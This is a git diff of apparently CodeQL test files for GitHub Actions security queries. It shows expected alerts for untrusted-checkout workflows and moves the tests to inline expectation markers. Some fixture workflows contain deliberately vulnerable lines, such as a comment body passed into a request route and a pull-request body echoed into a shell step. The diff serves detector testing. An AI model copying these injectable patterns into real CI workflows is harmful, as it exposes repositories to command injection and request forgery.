.github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | -| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref index 9f17733e16e..667c7a78638 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref @@ -1 +1,2 @@ -Security/CWE-829/UntrustedCheckoutCritical.ql +query: Security/CWE-829/UntrustedCheckoutCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref index 66b3f2cd9bf..84af7bdc723 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref @@ -1 +1,2 @@ -Security/CWE-829/UntrustedCheckoutHigh.ql +query: Security/CWE-829/UntrustedCheckoutHigh.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref index 55bb194f5ec..1cb2407ccc7 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref @@ -1 +1,2 @@ -Security/CWE-829/UntrustedCheckoutMedium.ql +query: Security/CWE-829/UntrustedCheckoutMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref index 1887390c0f3..e3d739264b2 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-829/UnversionedImmutableAction.ql +query: experimental/Security/CWE-829/UnversionedImmutableAction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml index 6937467453b..849f1cdf8ec 100644 --- a/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml +++ b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml @@ -6,5 +6,5 @@ jobs: steps: - uses: octokit/request-action@v2 with: - route: ${{ github.event.comment.body }} + route: ${{ github.event.comment.body }} # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected index d980139bb35..5387cf2ebab 100644 --- a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected +++ b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected @@ -1,6 +1,6 @@ +#select +| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | edges nodes | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths -#select -| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref index 5479b022be0..46eea075c3c 100644 --- a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref +++ b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-918/RequestForgery.ql +query: experimental/Security/CWE-918/RequestForgery.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml index a8bfa4ae19a..60f4b010f6d 100644 --- a/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml +++ b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml @@ -4,4 +4,4 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo ${{ github.event.pull_request.body}} + - run: echo ${{ github.event.pull_request.body}} # $ Alert diff --git a/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref index 97c5686103c..f2bd2df19cb 100644 --- a/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref +++ b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref @@ -1 +1,2 @@ -Debug/SyntaxError.ql +query: Debug/SyntaxError.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml index 31f43d8b8b2..301de120d6f 100644 --- a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml +++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml @@ -52,7 +52,7 @@ jobs: # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). # If this step fails, then you should remove it and run the build manually (see below) - - name: Autobuild + - name: Autobuild # $ Alert uses: github/codeql-action/autobuild@v3 # ℹ️ Command-line programs to run using the OS shell. diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref index 75a8fe2398a..1cdc74dec25 100644 --- a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref +++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref @@ -1 +1,2 @@ -Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql \ No newline at end of file +query: Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql